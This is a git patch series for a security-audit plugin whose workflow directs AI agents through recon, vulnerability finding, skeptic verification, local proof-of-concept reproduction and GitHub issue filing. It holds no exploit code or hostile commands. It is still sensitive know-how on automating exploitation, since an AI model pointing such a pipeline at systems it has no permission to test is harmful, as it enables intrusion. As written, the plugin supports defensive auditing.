+  owasp: { type: 'string' },
+  cwe: { type: 'string' },
+  asvs: { type: 'string' },
+  severity: { enum: ['critical', 'high', 'medium', 'low', 'info'] },
+  status: { enum: ['confirmed', 'likely', 'triage'] },
+  confidence: { enum: ['low', 'medium', 'high'] },
+  file: { type: 'string' },
+  line: { type: 'integer' },
+  code_excerpt: { type: 'string' },
+  source: { type: 'string' },
+  sink: { type: 'string' },
+  data_flow: { type: 'string' },
+  sanitizers_checked: { type: 'string' },
+  rationale: { type: 'string' },
+  exploit_sketch: { type: 'string' },
+  dynamic_poc_plan: { type: 'string' },
+  proposed_fix: { type: 'string' },
+  locations: { type: 'array', items: { type: 'string' } },
+}
+const FINDING = { type: 'object', properties: FINDING_PROPS, required: ['title', 'vuln_class', 'severity', 'file', 'rationale'], additionalProperties: true }
+const FINDINGS = { type: 'object', properties: { findings: { type: 'array', items: FINDING } }, required: ['findings'], additionalProperties: true }
+// Matches the contract emitted by prompts/recon.md: `stack` is one playbook key,
+// `run_strategy` is an enum string, `relevant_classes` is [{class, priority_surfaces}].
+const RECON = {
+  type: 'object',
+  properties: {
+    stack: { type: 'string' },
+    frameworks: { type: 'array', items: { type: 'string' } },
+    run_strategy: { enum: ['docker-compose', 'docker', 'native', 'unit-test', 'static-poc'] },
+    entrypoints: { type: 'array', items: { type: 'object', additionalProperties: true } },
+    attack_surface: { type: 'array', items: { type: 'object', additionalProperties: true } },
+    relevant_classes: { type: 'array', items: { type: 'object', properties: { class: { type: 'string' }, priority_surfaces: { type: 'array', items: { type: 'string' } } }, required: ['class'], additionalProperties: true } },
+    skipped_classes: { type: 'array', items: { type: 'object', additionalProperties: true } },
+    notes: { type: 'string' },
+  },
+  required: ['stack', 'run_strategy', 'relevant_classes'],
+  additionalProperties: true,
+}
+const DEEP = { type: 'object', properties: { keep: { type: 'boolean' }, reject_reason: { type: 'string' }, finding: FINDING }, required: ['keep', 'finding'], additionalProperties: true }
+const VERDICT = { type: 'object', properties: { lens: { type: 'string' }, refuted: { type: 'boolean' }, confidence: { enum: ['low', 'medium', 'high'] }, reasoning: { type: 'string' } }, required: ['refuted', 'reasoning'], additionalProperties: true }
+const REPRO = { type: 'object', properties: { reproduced: { type: 'boolean' }, method: { enum: ['live-exploit', 'unit-test', 'build-only', 'static-poc'] }, environment: { type: 'string' }, setup_commands: { type: 'array', items: { type: 'string' } }, poc: { type: 'string' }, observed: { type: 'string' }, impact: { type: 'string' }, notes: { type: 'string' } }, required: ['reproduced', 'method'], additionalProperties: true }
+const SYNTH = { type: 'object', properties: { report: { type: 'string' }, path: { type: 'string' }, stats: { type: 'object' } }, required: ['report'], additionalProperties: true }
+
+const AGENT = { agentType: 'general-purpose' }
+
+// ---- phase 1: recon ----
+phase('Recon')
+const recon = await agent(
+  `Follow the recon instructions in ${TOOL}/prompts/recon.md. Read that file first, then perform PHASE-1 recon on the target repository at ${TARGET} (ref ${REF}). Use Read/Grep/Bash/ast-grep to inspect it. Output the structured recon summary.\nHOST CONSTRAINTS (factor into run_strategy — do not pick a strategy the host can't execute): ${HOST || 'none noted'}.\n${SIGNAL}`,
+  { label: 'recon', phase: 'Recon', schema: RECON, ...AGENT },
+)
+
+// Explicit --classes is authoritative; otherwise use recon's relevant set (objects -> keys), falling back to all classes.
+// An explicit list that matches no known class is an error: running zero finders would otherwise read as a clean audit.
+const known = c => ALL_CLASSES.includes(c)
+let classes = ONLY ? ONLY.filter(known) : (recon.relevant_classes || []).map(c => (typeof c === 'string' ? c : c && c.class)).filter(known)
+if (ONLY && !classes.length) {
+  throw new Error(`vuln-audit: --classes matched no known vuln class (got: ${ONLY.join(', ')}; valid: ${ALL_CLASSES.join(', ')})`)
+}
+if (!classes.length) classes = ALL_CLASSES
+const runnable = DYNAMIC && ['docker-compose', 'docker', 'native'].includes(recon.run_strategy)
+log(`recon: ${recon.stack} | strategy: ${recon.run_strategy} | classes: ${classes.join(', ')} | dynamic: ${runnable ? 'yes' : 'no'}`)
+
+// ---- phase 2: triage finders ----
+phase('Triage')
+const finderResults = (await parallel(classes.map(k => () => agent(
+  `Audit the target repository for the "${k}" vulnerability class. FIRST read the finder prompt at ${TOOL}/prompts/finders/${k}.md and follow it exactly. Target: ${TARGET} (ref ${REF}). Prioritize these surfaces surfaced by recon: ${JSON.stringify((recon.attack_surface || []).slice(0, 40))}. Inspect code with Read/Grep/Bash/ast-grep. ${SIGNAL} Return {findings:[...]}; each candidate must fill source, sink, data_flow, and sanitizers_checked. Return {findings:[]} if nothing real.`,
+  { label: `find:${k}`, phase: 'Triage', schema: FINDINGS, ...AGENT },
+)))).filter(Boolean)
+const raw = finderResults.flatMap(r => (r && r.findings) || [])
+log(`triage: ${raw.length} raw candidates from ${classes.length} finders`)
+
+// ---- phase 3: consolidate (barrier: needs all candidates at once) ----
+phase('Consolidate')
+let consolidated = []
+if (raw.length) {
+  const c = await agent(
+    `You are the triage lead for a security audit of ${TARGET}. Raw candidate findings from per-class finders:\n${JSON.stringify(raw)}\n\nDeduplicate: collapse the same root cause across multiple call sites into ONE finding with a locations[] list. Assign stable ids by class (AC-1, SSRF-1, INJ-1, ...). Drop noise per the signal policy. Order by severity. ${SIGNAL} Return {findings:[...]}.`,
+    { label: 'consolidate', phase: 'Consolidate', schema: FINDINGS, ...AGENT },
+  )
+  consolidated = (c && c.findings) || []
+}
+log(`consolidated: ${consolidated.length} candidate findings`)
+
+// ---- phases 4-6: per-finding pipeline (deep review -> verify -> repro) ----
+const processed = consolidated.length ? await pipeline(
+  consolidated,
+  // 4. deep review
+  (f) => agent(
+    `Deep-review this candidate against the target ${TARGET} (ref ${REF}). Finding:\n${JSON.stringify(f)}\n\nRead the surrounding code: the sink, its callers, any sanitizers/validators/authz on the path, and related files — as a careful reviewer would. Decide if there is a REACHABLE path from untrusted input to the sink with no effective mitigation. If it is a false positive, unreachable, mitigated, or out of scope, set keep=false with a short reject_reason. Otherwise keep=true and return the finding enriched with accurate severity, confidence, data_flow, sanitizers_checked, and a high-level proposed_fix (the DIRECTION of the change and why — not a diff or line-level patch; implementation is left to whoever takes the issue). ${SIGNAL}`,
+    { label: `review:${f.id || f.title}`, phase: 'Review', schema: DEEP, ...AGENT },
+  ),
+  // 5. adversarial verify (skeptic panel)
+  async (rev) => {
+    if (!rev || !rev.keep) return rev
+    const votes = (await parallel(Object.keys(LENSES).map(lens => () => agent(
+      `You are an INDEPENDENT security skeptic. Try to REFUTE this finding for target ${TARGET}, using the "${lens}" lens. Read the actual code to check. Finding:\n${JSON.stringify(rev.finding)}\n\nLens: ${LENSES[lens]}\nDefault to refuted=true if you cannot establish a concrete, reachable exploit. Return your verdict.`,
+      { label: `verify:${rev.finding.id || 'f'}:${lens}`, phase: 'Verify', schema: VERDICT, ...AGENT },
+    )))).filter(Boolean)
+    const refutes = votes.filter(v => v.refuted).length
+    return { ...rev, keep: refutes < 2, refuted: refutes >= 2, verdicts: votes }
+  },
+  // 6. dynamic repro (only survivors, only if runnable)
+  async (rev) => {
+    if (!rev) return rev
+    if (!rev.keep || !runnable) return { ...rev, repro: null }
+    const repro = await agent(
+      `Reproduce this finding dynamically against a RUNNING instance of the target, to prove it. Finding:\n${JSON.stringify(rev.finding)}\nRun strategy: ${recon.run_strategy}. Boot notes from recon: ${JSON.stringify(recon.notes || '')}.\nFollow the env playbook at ${TOOL}/prompts/playbooks/${recon.stack}.md. Create a git worktree of ${TARGET} at ${REF} so the original tree is untouched; build & run it (docker-first). Use a UNIQUE container name and an ephemeral host port keyed to "${rev.finding.id || 'f'}" to avoid collisions with parallel repros. Fire the PoC and capture the observed result as evidence. Keep ALL traffic local — no external targets, no real credentials, no exfiltration. Tear down containers/processes and the worktree when done. HOST CONSTRAINTS (honor when choosing how to run — e.g. if docker is unavailable, run the app natively instead): ${HOST || 'none noted'}. If it genuinely cannot run live, fall back to a unit-test or static PoC and set method accordingly. Return the repro result.`,
+      { label: `repro:${rev.finding.id || 'f'}`, phase: 'Repro', schema: REPRO, ...AGENT },
+    )
+    return { ...rev, repro }
+  },
+) : []
+
+const results = processed.filter(Boolean)
+
+// normalize status: confirmed (repro reproduced) > likely (kept, no repro) > triage (rejected in deep review or refuted by the verify panel; reject_reason always says which)
+const finalFindings = results.map(r => {
+  const f = { ...r.finding }
+  if (!r.keep) f.status = 'triage'
+  else if (r.repro && r.repro.reproduced) f.status = 'confirmed'
+  else f.status = 'likely'
+  const fp = fingerprint(f)
+  const display_id = `${TARGET_NAME}-${CLASS_CODE[f.vuln_class] || 'GEN'}-${fp.slice(0, 4)}`  // provisional; courier swaps the suffix for the GitHub issue number
+  return { ...f, fp, display_id, kept: !!r.keep, reject_reason: r.reject_reason || (r.refuted ? 'refuted by adversarial verify panel (see verdicts)' : null), verdicts: r.verdicts || null, repro: r.repro || null }
+})
+
+// tally
+const sevOrder = ['critical', 'high', 'medium', 'low', 'info']
+const counts = { bySeverity: {}, byStatus: { confirmed: 0, likely: 0, triage: 0 }, total: finalFindings.length }
+for (const s of sevOrder) counts.bySeverity[s] = 0
+for (const f of finalFindings) {
+  if (counts.bySeverity[f.severity] !== undefined) counts.bySeverity[f.severity]++
+  if (counts.byStatus[f.status] !== undefined) counts.byStatus[f.status]++
+}
+log(`results: ${counts.byStatus.confirmed} confirmed, ${counts.byStatus.likely} likely, ${counts.byStatus.triage} triage`)
+
+// ---- phase 7: synthesize the bundle (report.md + findings.json + manifest.json); manifest commit is resolved from REF, not HEAD ----
+phase('Report')
+const BUNDLE = `${OUT}/reports/${TARGET_NAME}`
+const synth = await agent(
+  `Produce the audit BUNDLE — the self-contained artifact a separate "courier" agent will fetch and file to GitHub. Create the directory ${BUNDLE}/ and write THREE files.
+
+SOURCE DATA — the finalized findings (each carries fp, display_id, severity, status, source/sink/data_flow, PoC via repro.observed, and proposed_fix):
+${JSON.stringify(finalFindings)}
+
+Severity tally: ${JSON.stringify(counts)}
+Recon: ${JSON.stringify({ stack: recon.stack, frameworks: recon.frameworks, run_strategy: recon.run_strategy, relevant_classes: classes, skipped: recon.skipped_classes })}
+
+1. ${BUNDLE}/report.md — the human report. FIRST read ${TOOL}/prompts/report-template.md and follow it EXACTLY. Use each finding's "display_id" as its [ID] in the headings. Target: ${TARGET} (ref ${REF}). Scope: ${SCOPE}. Body = confirmed/likely Critical/High/Medium only; appendix = Low/Info + triage (with why) + coverage & method. Terse, senior-oriented; let CWE/OWASP-2025/ASVS refs carry the explanation; show PoC evidence for confirmed findings.
+
+2. ${BUNDLE}/findings.json — write the SOURCE DATA array above VERBATIM as JSON. Preserve every field and all PoC/observed/fix text exactly; do NOT summarize, reorder, or drop fields. This is the machine interface the courier reconciles against (keyed by "fp").
+
+3. ${BUNDLE}/manifest.json — a JSON object describing the scan. Get real values via Bash: \`date -u +%Y-%m-%dT%H:%M:%SZ\` for date; \`git -C ${TARGET} rev-parse ${REF}^{commit}\` for commit (the audited ref, which may differ from the checked-out HEAD); \`git -C ${TARGET} remote get-url origin\` for the repo (normalize an SSH/HTTPS URL to "owner/repo"). Shape: { "tool": "vuln-audit", "schema": 1, "repo": "<owner/repo or null>", "target_path": "${TARGET}", "ref": "${REF}", "commit": "<full sha>", "slug": "${TARGET_NAME}", "date": "<utc iso8601>", "dynamic": ${runnable}, "classes_assessed": ${JSON.stringify(classes)}, "counts": ${JSON.stringify(counts)} }.
+
+Return {report: "<the full report.md content>", path: "${BUNDLE}/report.md", stats: ${JSON.stringify(counts)}}.`,
+  { label: 'synthesize', phase: 'Report', schema: SYNTH, ...AGENT },
+)
+
+return {
+  bundle_dir: BUNDLE,
+  report_path: (synth && synth.path) || `${BUNDLE}/report.md`,
+  findings_path: `${BUNDLE}/findings.json`,
+  manifest_path: `${BUNDLE}/manifest.json`,
+  report: synth && synth.report,
+  counts,
+  stack: recon.stack,
+  classes_assessed: classes,
+  runnable: !!runnable,
+}

From 77e0595dd914de9a2aab07ba443d3a86b7553748 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 11:51:06 +0200
Subject: [PATCH 2/5] security: document audit flags in README

Add a flag-reference table explaining --no-dynamic, --classes, --ref, and
--out, which were previously listed only as usage examples.
---
 plugins/security/README.md | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/plugins/security/README.md b/plugins/security/README.md
index 98ea224..458961a 100644
--- a/plugins/security/README.md
+++ b/plugins/security/README.md
@@ -24,8 +24,17 @@ Then run `/reload-plugins` if the command doesn't appear.
 /security:audit /abs/path/to/target-repo --out /abs/writable/dir
 ```
 
-The output **bundle** is written to `<cwd>/vuln-audit-reports/<slug>/` (or
-`--out`): `report.md` + `findings.json` + `manifest.json`.
+The first argument is the path to the target repo (required). The flags:
+
+| Flag | Meaning |
+|------|---------|
+| `--no-dynamic` | Skip the build/run/PoC phase — static review + adversarial verify only. |
+| `--classes` | Comma-separated vuln-class keys to restrict the audit to (e.g. `injection,ssrf,access-control`; see [`AGENTS.md`](AGENTS.md) for the full taxonomy). Default: classes picked by recon. |
+| `--ref` | Git ref to audit. Default: `HEAD`. |
+| `--out` | Writable directory for the output bundle. Default: `<cwd>/vuln-audit-reports`. |
+
+The output **bundle** is written to `<out>/reports/<slug>/`: `report.md` +
+`findings.json` + `manifest.json`.
 
 ## How it works
 

From d6a6778a859eb293e5809598314573fa4f01a451 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 11:51:06 +0200
Subject: [PATCH 3/5] security: pin and announce the audit run ref
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Resolve the ref to a concrete commit and print a terse startup line (target,
pinned SHA, output dir), naming the ref only when it isn't HEAD — instead of
echoing the literal "HEAD"/"default".
---
 plugins/security/skills/audit/SKILL.md | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/plugins/security/skills/audit/SKILL.md b/plugins/security/skills/audit/SKILL.md
index b31f646..fe83f68 100644
--- a/plugins/security/skills/audit/SKILL.md
+++ b/plugins/security/skills/audit/SKILL.md
@@ -40,6 +40,9 @@ changing anything.
 3. **Validate the target** — confirm it exists and is a git repo
    (`git -C <target> rev-parse --git-dir`). Worktree isolation and the live-PoC
    phase need git. If it isn't a repo, warn and proceed with `--no-dynamic`.
+   Resolve the ref to a concrete commit with
+   `git -C <target> rev-parse --short <ref or HEAD>` so the run is pinned and
+   reproducible; carry both the ref name and the resolved SHA.
 4. **Preflight host capabilities** → assemble a `hostNotes` string: is `docker`
    usable non-interactively (note if it needs `sudo`); which native runtimes are
    present (`python3`, `node`, `ruby`, `go`, `crystal`, ...). If dynamic is on
@@ -47,7 +50,11 @@ changing anything.
    `--no-dynamic` and say repro will be static/unit-test only.
 5. **Check target threat-model** — note whether
    `<target>/.claude/claude-security-guidance.md` exists; recon folds it in.
-6. **Invoke the workflow** (it runs in the background and notifies on completion):
+6. **Announce the run** — before invoking, print a one-line startup summary:
+   target name, the resolved commit (short SHA), and the absolute output
+   directory. Name the ref only when it isn't `HEAD` (e.g. `v1.2.0 a1b2c3d`);
+   for a plain `HEAD` run just show the SHA. Drop anything left at its default.
+7. **Invoke the workflow** (it runs in the background and notifies on completion):
    ```
    Workflow({ scriptPath: '${CLAUDE_PLUGIN_ROOT}/workflows/vuln-audit.js', args: {
      toolRoot: '${CLAUDE_PLUGIN_ROOT}',
@@ -60,7 +67,7 @@ changing anything.
      hostNotes: '<from step 4>'
    }})
    ```
-7. **Present the result** — when it completes, read `report_path` and give a
+8. **Present the result** — when it completes, read `report_path` and give a
    tight summary: severity counts and the top 1–3 confirmed findings (title +
    location + one-line impact). Point to the bundle dir; don't paste the whole
    report. Surface anything that blocked dynamic verification.

From 6119120029fd91741ed97ff9dbb4defd937053ed Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 14:34:04 +0200
Subject: [PATCH 4/5] security: embed scan report as an upserted epic comment
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Document that the full report.md lives in a collapsed <details> comment on
the scan epic — never a VM-local bundle path — and that the courier upserts
that comment via a hidden marker so re-runs stay idempotent.
---
 plugins/security/docs/issue-tracking.md | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/plugins/security/docs/issue-tracking.md b/plugins/security/docs/issue-tracking.md
index 94901da..503250b 100644
--- a/plugins/security/docs/issue-tracking.md
+++ b/plugins/security/docs/issue-tracking.md
@@ -46,8 +46,9 @@ Each scan drops a self-contained bundle at `reports/<slug>/` on the VM:
 
 ## Issue model
 
-- **Scan issue** (epic), one per run: holds the report + general comments; closes
-  when all its finding sub-issues close.
+- **Scan issue** (epic), one per run: holds the report (as a comment, see
+  **Report comment** below) + general comments; closes when all its finding
+  sub-issues close.
 - **Finding sub-issue**, one per **Critical / High / Medium** (confirmed+likely).
   **Low/Info stay in the report appendix — never issues** (same high-signal
   contract as the report).
@@ -63,6 +64,12 @@ Each scan drops a self-contained bundle at `reports/<slug>/` on the VM:
 - **PoC handling:** repos are private/internal, so full PoC commands go in the
   issues (the remediation is a high-level *proposed fix*, not a patch). (If a target were public, use GitHub Security Advisories for
   Critical/High instead.)
+- **Report comment:** the full `report.md` is **embedded** in a comment on the
+  scan epic, wrapped in a `<details><summary>…</summary>` block (collapsed by
+  default) so the long report never buries the epic's sub-issue checklist. Always
+  embed the report text itself — **never** reference a local bundle path
+  (`reports/<slug>/…`) or any other filesystem location, since neither is
+  reachable from GitHub. The epic body points readers to this comment, not to disk.
 
 ## Reconcile algorithm (idempotent, keyed by `fp`)
 
@@ -75,6 +82,11 @@ by the `fp:<hash>` label (`gh issue list --search "label:fp:<fp>" --state all`):
 - **previously open, now absent / not reproduced** (dynamic re-verify) → comment +
   close.
 
+The **report comment** on the epic is upserted just as idempotently, but keyed
+by a hidden marker rather than a label: tag it with `<!-- vuln-audit:report -->`,
+then find and edit that comment on re-run instead of posting a new one — so the
+epic never accumulates duplicate report blocks.
+
 Re-running the courier on the same bundle is a no-op. The dynamic-repro phase
 doubles as the fix-verifier, so "everything closed when done" is provable, not
 manual.

From 20828916a42f14f6e4f9bad5cb9a430cfe605049 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johan=20Eckerstr=C3=B6m?= <johan@duh.se>
Date: Wed, 3 Jun 2026 14:44:12 +0200
Subject: [PATCH 5/5] security: trim issue labels to fp + security

Severity, class, and verification status already live in the issue title,
display ID, and body, so sev:/vuln:/status: labels just duplicated that text.
Keep fp:<hash> (the dedup key the reconcile step searches on) and
security/security-scan.
---
 plugins/security/docs/issue-tracking.md | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/plugins/security/docs/issue-tracking.md b/plugins/security/docs/issue-tracking.md
index 503250b..36e972b 100644
--- a/plugins/security/docs/issue-tracking.md
+++ b/plugins/security/docs/issue-tracking.md
@@ -55,12 +55,14 @@ Each scan drops a self-contained bundle at `reports/<slug>/` on the VM:
 - **Title:** `[Critical] training-tool-AC-42: <short title> (access-control)`.
 - **Body:** the report's finding block (refs · location · PoC · impact ·
   proposed fix) + backlink to the scan issue + the `fp` marker.
-- **Labels:** `security`, `security-scan` (epic), `sev:{critical,high,medium}`,
-  `vuln:<class>`, `fp:<hash>`, `status:{confirmed,likely}` (verification outcome).
+- **Labels:** `security`, `security-scan` (epic), and `fp:<hash>` (the dedup
+  key the reconcile step searches on). Severity and class aren't labels — they
+  live in the title (`[Critical] … (access-control)`) and the display ID, so a
+  `sev:`/`vuln:` label would just duplicate that text.
 - **Two distinct "statuses":** *verification* (confirmed/likely — a scan output,
-  carried as the finding's badge + the `status:` label) vs *lifecycle*
-  (open/fixed — owned entirely by the GitHub issue). The **report has no status
-  table**; the scan epic and its sub-issues are the live status.
+  carried as the finding's badge in the title/body) vs *lifecycle* (open/fixed —
+  owned entirely by the GitHub issue). The **report has no status table**; the
+  scan epic and its sub-issues are the live status.
 - **PoC handling:** repos are private/internal, so full PoC commands go in the
   issues (the remediation is a high-level *proposed fix*, not a patch). (If a target were public, use GitHub Security Advisories for
   Critical/High instead.)